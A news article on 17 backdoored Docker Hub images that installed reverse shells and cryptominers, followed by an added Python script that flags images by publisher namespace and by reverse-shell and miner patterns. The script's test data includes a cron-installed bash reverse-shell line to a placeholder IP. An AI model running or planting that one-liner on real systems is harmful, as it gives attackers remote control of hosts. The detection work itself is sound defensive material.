17 Backdoored Docker Images Removed From Docker Hub

Posted on Jun 14, 2018

The Docker team has pulled 17 container images that had been backdoored and used to install reverse shells and cryptocurrency miners on users’ servers over the past year. The malicious images had been uploaded to Docker Hub, the official repository of ready-made Docker images that sysadmins pull and run on their servers, work machines, or personal computers. Such images let a sysadmin start an application container within seconds, without building their own image, a process that is fiddly enough that many users are unable or unwilling to do it themselves.

Because images uploaded to Docker Hub by ordinary users are not audited or tested before publication, these images were listed on the portal right away, where they remained available between May 2017 and May 2018, when the Docker team finally pulled them down. All 17 images were uploaded to Docker Hub by the same person or group, using the pseudonym ‘docker123321.’ Some of the images were pulled more than one million times, others hundreds of thousands of times.

Signs that something was wrong in the Docker and Kubernetes (the container orchestration platform used to run containers at scale) ecosystem started appearing in September 2017 and continued through the winter. Users reported malicious activity on their cloud servers running Docker and Kubernetes. Reports of security incidents involving these Docker images were posted on GitHub and Twitter.
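A check a practitioner would want after a story like this is whether any image already pulled onto a host came from the publisher named above, or carries layer commands typical of the reverse shells and miners the article describes. The script below is an added example, not code from the article, from Docker, or from the researchers who reported the images. It assumes the JSON-lines form of `docker history --no-trunc --format '{{json .}}' IMAGE` as its input; the namespace `docker123321` is the only indicator taken from the article, while the command patterns and the sample history are assumptions constructed for illustration.

```python
"""Flag pulled Docker images published under a known-malicious Docker Hub
namespace, or whose layer history contains commands typical of reverse
shells and cryptominers. Added example; not from the article or Docker."""
import json
import re

# The only indicator taken from the article. Anything else added here is an assumption.
KNOWN_BAD_NAMESPACES = {"docker123321"}

# Heuristic patterns (assumptions, not from the article): common reverse-shell
# idioms, miner binaries, mining-pool URLs and cron-based persistence.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"/dev/tcp/"), "bash reverse shell via /dev/tcp"),
    (re.compile(r"\bnc\b.*\s-e\s"), "netcat with -e (reverse shell)"),
    (re.compile(r"\bbash\s+-i\b"), "interactive bash (reverse shell)"),
    (re.compile(r"stratum\+tcp://"), "mining pool URL"),
    (re.compile(r"\b(xmrig|minerd|cpuminer)\b"), "known miner binary"),
    (re.compile(r"(crontab|/etc/cron)"), "cron persistence"),
]


def image_namespace(repo_tag):
    """Return the publisher namespace of 'ns/name[:tag]'.

    Official Docker Hub images ('nginx:1.15') live in the implicit 'library'
    namespace. A trailing ':tag' is stripped, but a registry port such as
    'host:5000/ns/name' is not mistaken for a tag. Digest references are not handled.
    """
    repo = repo_tag
    head, sep, tail = repo_tag.rpartition(":")
    if sep and "/" not in tail:
        repo = head
    parts = repo.split("/")
    if len(parts) == 1:
        return "library"
    return parts[-2]


def parse_history(jsonl):
    """Parse JSON-lines output of `docker history --no-trunc --format '{{json .}}'`."""
    entries = []
    for line in jsonl.splitlines():
        line = line.strip()
        if line:
            entries.append(json.loads(line))
    return entries


def audit_image(repo_tag, history_jsonl):
    """Return a list of human-readable findings for one image (empty if clean)."""
    findings = []
    ns = image_namespace(repo_tag)
    if ns in KNOWN_BAD_NAMESPACES:
        findings.append(f"{repo_tag}: published under known-malicious namespace '{ns}'")
    for layer in parse_history(history_jsonl):
        cmd = layer.get("CreatedBy", "")
        for pattern, why in SUSPICIOUS_PATTERNS:
            if pattern.search(cmd):
                findings.append(f"{repo_tag}: layer {layer.get('ID', '?')}: {why}: {cmd.strip()}")
    return findings


# Constructed sample history (not real image data): one layer installs a cron job
# that opens a bash reverse shell to a documentation-range IP address.
SAMPLE_HISTORY = "\n".join([
    json.dumps({"ID": "sha256:aaa", "CreatedBy": "/bin/sh -c #(nop)  CMD [\"/bin/sh\"]", "Size": "0B"}),
    json.dumps({"ID": "sha256:bbb",
                "CreatedBy": "/bin/sh -c echo '* * * * * bash -i >& /dev/tcp/203.0.113.5/4444 0>&1' | crontab -",
                "Size": "1kB"}),
    json.dumps({"ID": "sha256:ccc", "CreatedBy": "/bin/sh -c apk add --no-cache bash", "Size": "4MB"}),
])

# Constructed sample of a history with nothing suspicious.
CLEAN_HISTORY = json.dumps({"ID": "sha256:aaa", "CreatedBy": "/bin/sh -c #(nop)  CMD [\"/bin/sh\"]", "Size": "0B"})


if __name__ == "__main__":
    for line in audit_image("docker123321/tomcat:latest", SAMPLE_HISTORY):
        print(line)
```

On a real host, run `docker images --format '{{.Repository}}:{{.Tag}}'` and feed each name together with its `docker history --no-trunc --format '{{json .}}'` output into `audit_image`. The namespace check is exact and reliable for the publisher named in the article; the command patterns are only heuristics, and a backdoor that fetches its payload at run time (for example from an ENTRYPOINT script) will not show up in the layer history at all, so a match here is a reason to inspect the image, and a clean result is not proof of safety.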

Source: bleepingcomputer.com